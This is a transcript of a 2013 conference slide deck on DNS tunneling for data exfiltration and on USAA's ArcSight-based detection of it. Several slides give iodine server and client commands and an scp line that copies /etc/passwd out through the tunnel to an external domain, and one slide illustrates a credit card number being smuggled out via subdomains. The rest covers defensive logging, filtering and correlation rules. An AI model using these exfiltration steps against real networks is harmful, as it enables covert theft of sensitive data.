DNS data exfiltration - Micro Focus Community · DNS data exfiltration Pete Babcock - USAA What is...
Transcript of DNS data exfiltration - Micro Focus Community · DNS data exfiltration Pete Babcock - USAA What is...
© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
DNS data exfiltration Pete Babcock - USAA
What is DNS Tunneling?
Problem Statement
2
What happened?
The CTOC discovered that DNS tunneling could be used to exfiltrate data from USAA. Last year, in a penetration test, an External Pen Tester hired by USAA confirmed that fact.
What is DNS Tunneling?
USAA CONFIDENTIAL
3
DNS
After hacking the Member’s USAA Account… Normal DNS Traffic (Simplified)
www.google.com
DNS Server Security Monitoring
Firewall
DNS Server
74.125.227.210
USAA CONFIDENTIAL
4
DNS
After hacking the Member’s USAA Account… DNS Tunneling (Greatly Simplified)
yourcre.evilbono.com
DNS Server Security Monitoring
Firewall
“DNS Server”
ditcard.evilbono.com
yourcre ditcard
USAA CONFIDENTIAL
DNS Tunneling
Data Loss Prevention
5
What happened?
The CTOC discovered that DNS tunneling could be used to exfiltrate data from USAA. Last year, in a penetration test, an External Pen Tester hired by USAA confirmed that fact.
What is DNS Tunneling?
How hard is it to detect and prevent?
There are no known commercial products that can easily detect this. Very few companies have home grown solutions. Detection is prone to false positives. There are no known Prevention capabilities. (That don’t break your business…)
USAA CONFIDENTIAL
Tools
DNS Tunneling Testing
6
What tools can be used to facilitate DNS Tunneling?
There are several, but for this demonstration we used Iodine, which is free.
What are the steps to perform DNS tunneling?
1. Start the Virtual Machine that you plan to run the Iodine Server on. a) We used Ubuntu Linux, but there are many options available.
2. Configure external DNS records for owned domain: a) Delegate subdomain NS record to host running Iodine Server
USAA CONFIDENTIAL
Tools
DNS Tunneling Testing
7
3. Port forward udp53 from external IPs to internal VMWare host running Iodine Server.
What tools can be used to facilitate DNS Tunneling?
There are several, but for this demonstration we used Iodine, which is free.
What are the steps to perform DNS tunneling?
1. Start the Virtual Machine that you plan to run the Iodine Server on. a) We used Ubuntu Linux, but there are many options available.
2. Configure external DNS records for owned domain: a) Delegate subdomain NS record to host running Iodine Server
Tools
DNS Tunneling Testing
8
4. Disable any applications currently bound to UDP 53 (like bind) sudo service bind9 stop
3. Port forward udp53 from external IPs to internal VMWare host running Iodine Server.
What tools can be used to facilitate DNS Tunneling?
There are several, but for this demonstration we used Iodine, which is free.
What are the steps to perform DNS tunneling?
1. Start the Virtual Machine that you plan to run the Iodine Server on. a) We used Ubuntu Linux, but there are many options available.
2. Configure external DNS records for owned domain: a) Delegate subdomain NS record to host running Iodine Server
5. Start Iodine Server on virtual machine:) sudo iodined –f –c –P secreUSAA1 192.168.99.1 tunnel.hajda.net
USAA CONFIDENTIAL
Tools
DNS Tunneling Testing
USAA CONFIDENTIAL 9
4. Start iodine client on internal host: sudo iodine –f –P secretUSAA1 tunnel.hajda.net
5. Remote server IP is now 192.168.99.1, copy files through SCP: scp /etc/passwd [email protected]:/tmp
What are the steps to perform DNS tunneling?
You just sent data through a DNS Tunnel !
And your company probably wouldn’t detect it…
DNS Query Logging and Transmission
USAA Solution
10
How does one monitor for this type of traffic?
Easy. Just turn on query logging for all DNS traffic leaving your company.
An alternative solution utilizing the Load Balancers had to be created and tested. The Load Balancers are strategically placed in front of the DNS solution. Rules on the Load Balancers create load balancer log events for the DNS queries. These events are then streamed via syslog to the ArcSight Connector servers.
Now quickly turn it back off, because you probably just killed your DNS solution...
Most DNS solutions were not designed to log this volume of events long term.
So, how did USAA successfully log all DNS queries leaving the company then?
USAA CONFIDENTIAL
ArcSight Connector – Volume Issues
USAA Solution
11
Doesn’t this place a lot of load then on the ArcSight Connector?
Yes.
An alternative solution utilizing the Load Balancers had to be created and tested. Multiple ArcSight Connectors are created for DNS – Syslog. These Connectors are placed behind Load Balancers. The load balancer has a Virtual IP Address that it load balances for the connectors. The DNS syslog events are distributed amongst the connectors via the load balanced VIP.
How do you scale the ArcSight Connector to handle the load?
USAA CONFIDENTIAL
ArcSight Connector - Parsing
USAA Solution
12
How do you parse the Load Balancer log events?
USAA’s Load Balancers can create the events in the Common Event Format (CEF). The default Syslog Daemon connector will parse these out of the box.
However, USAA wanted to extract specific portions of the destinationHostName field to the destinationDnsDomain field. This necessitated a Flex Connector.
This step could be avoided by doing the parsing in the rule using local variables. USAA chose to perform this step at the connector to save CPU on the Manager.
USAA CONFIDENTIAL
ESM – Volume Issues
USAA Solution
13
So this was the end of the event acquisition issues?
No. The volume of DNS query events quickly began consuming all of the ArcSight ESM ARC_EVENT_DATA free space…
What steps were taken next?
ArcSight ESM Connector filters were then created.
What was filtered?
First, known high volume USAA devices that generate false positives were filtered: ArcSight Connectors Mail Exchangers Proxy Servers
Second, high volume DNS domains that would not be likely to exploit DNS tunneling were filtered.
USAA CONFIDENTIAL
ESM – Rule Filters
USAA Solution
14
DNS events might be useful for other rules. Should you filter all false positive domains out at the Connector Filter level?
This is a subjective thing. There are some domains that USAA chose to filter out at the Rule Filter level instead of the Connector Filter level.
USAA CONFIDENTIAL
ESM – Rule
USAA Solution
15
Now that all of the prep work is done, what does the ESM Rule look like?
At the end of the day, the ESM rule is a variation of the basic “N number of events matching X conditions with M amount of time” Rule
We will look at the rule one tab at a time…
USAA CONFIDENTIAL
USAA Solution
USAA CONFIDENTIAL 16
Give me DNS query events.
Base and Aggregated events. Not Correlation or Action.
Filter ArcSight Connector DNS queries.
Filter Proxy Server DNS queries.
Filter Mail Exchanger DNS queries.
Filter Specific DNS queries: photobucket.com
Filter Specific DNS queries: images at har.com
Filter sources that are VPN user machines.
Rules Filter: Specific Destination Domains
USAA Solution
USAA CONFIDENTIAL 17
N = 40 matches M = 5 Minutes
Where the Host portion of the DNS query has multiple 40 variations
And the Source Address and Destination DNS Domain remain the same.
USAA Solution
USAA CONFIDENTIAL 18
Suppress exact duplicates for a set amount of time.
Include an external USAA Use Case link in the rule fire Meta Event.
And create a “Must Respond” case for the Analyst to work.
ESM – Cases
USAA Solution
19
What do the ESM Cases look like for these rule fires?
Note: The 10.122.x.x IP Address used for these examples is a Test Lab set up for this demonstration and does not reflect USAA’s Production Environment.
USAA CONFIDENTIAL
Data Loss Prevention
USAA CONFIDENTIAL 20
Data Loss Prevention
USAA CONFIDENTIAL 21
Data Loss Prevention
USAA CONFIDENTIAL 22
DNS Tunneling
Results
23
Is this solution in Production?
Yes.
Have we detected any true, malicious DNS Tunneling yet?
No, this sophisticated type of exfiltration was not detected. USAA was hoping that we would not see any DNS Tunneling occurring (other than our tests) and was grateful to be proven correct.
Did this satisfy the requirements to monitor for this activity?
Yes, USAA has satisfied the auditors and our own management.
More importantly, we have increased USAA’s security around Data Loss Prevention!
USAA CONFIDENTIAL
Questions?
Q&A
24 USAA CONFIDENTIAL
© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Security for the new reality